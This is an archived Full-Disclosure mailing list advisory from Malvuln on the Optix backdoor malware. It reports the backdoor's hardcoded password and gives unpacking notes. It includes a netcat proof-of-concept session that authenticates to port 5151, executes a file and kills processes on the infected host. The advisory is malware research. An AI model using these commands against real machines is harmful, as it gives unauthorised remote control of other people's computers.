lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CAAHK0WSDuGkrOBHXcTucKV9Yoy+AQLh7AbC4qGdoppfHqZSB9Q@mail.gmail.com>
Date: Tue, 3 Sep 2024 21:14:58 -0400
From: malvuln <malvuln13@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Backdoor.Win32.Optix.02.b / Weak Hardcoded Credentials

Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024
Original source:
https://malvuln.com/advisory/706ddc06ebbdde43e4e97de4d5af3b19.txt
Contact: malvuln13@...il.com
Media: x.com/malvuln

Threat: Backdoor.Win32.Optix.02.b
Vulnerability: Weak Hardcoded Credentials
Description: Optix listens on TCP port 5151 and is packed with ASPack
(2.11d). Unpacking is trivial set breakpoints on POPAD, RET, run and
dump using OllyDumpEx. The unpacked PE file reveals a very weak three
character cleartext password "1q1" stored as "svrpwd=1q1" at offset:
0000da4c of the unpacked malware. Commands sent to the backdoor use a
semicolon ";" as a marker E.g. password;1q1;
Family: Optix
Type: PE32
MD5: 706ddc06ebbdde43e4e97de4d5af3b19
SHA256: 2d38b18bdedfa7f27aac3f52a6d717f3cef7cf809e06f4a34ac0a93c90a82b1c
Vuln ID: MVID-2024-0690
Disclosure: 09/03/2024

Exploit/PoC:
nc64.exe x.x.x.x 5151
password;1q1;
password;1;Optix Lite v0.2 Server Ready...
ExecFile;"c:\Windows\System32\calc.exe"
Response;File Ran Successfully
GetPath;
TheServerPath;c:\windows\sec32.exe
GetSysDir;
TheSysDir;
;C:\WINDOWS\system32\
GetWinDir;
TheWinDir;
;C:\WINDOWS\
KillProcPls;pestudio.exe;
Response;Program killed successfully!
KillProcPls;die.exe;
Response;Program killed successfully!
GetProcsPls;
HeresDaProcs;[System
Process];System;smss.exe;csrss.exe;wininit.exe;csrss.exe;winlogon.exe;services.exe;lsass.exe;fontdrvhost.exe;fontdrvhost.exe;svchost.exe;svchost.exe;dwm.exe;...


Disclaimer: The information contained within this advisory is supplied
"as-is" with no warranties or guarantees of fitness of use or
otherwise. Permission is hereby granted for the redistribution of this
advisory, provided that it is not altered except by reformatting it,
and that due credit is given. Permission is explicitly given for
insertion in vulnerability databases and similar, provided that due
credit is given to the author. The author is not responsible for any
misuse of the information contained herein and accepts no
responsibility for any damage caused by the use or misuse of this
information. The author prohibits any malicious use of security
related information or exploits by the author or elsewhere. Do not
attempt to download Malware samples. The author of this website takes
no responsibility for any kind of damages occurring from improper
Malware handling or the downloading of ANY Malware mentioned on this
website or elsewhere. All content Copyright (c) Malvuln.com (TM).
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ